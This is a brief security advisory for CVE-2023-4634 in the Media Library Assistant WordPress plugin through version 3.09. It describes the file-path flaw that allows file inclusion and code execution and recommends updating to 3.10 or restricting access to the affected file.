CVE-2023-4634

Name of the Vulnerable Software and Affected Versions Media Library Assistant plugin for WordPress versions up to, and including, 3.09

Description The issue is related to insufficient controls on file paths being supplied to the mla stream file parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible. The estimated number of potentially affected devices worldwide is around 70,000 WordPress sites.

Recommendations For Media Library Assistant plugin for WordPress versions up to, and including, 3.09, update to version 3.10 or newer as soon as possible to resolve the issue. As a temporary workaround, consider restricting access to the mla stream file parameter and the ~/includes/mla-stream-image.php file to minimize the risk of exploitation. Additionally, avoid using the mla stream file parameter in the affected API endpoint until the issue is resolved.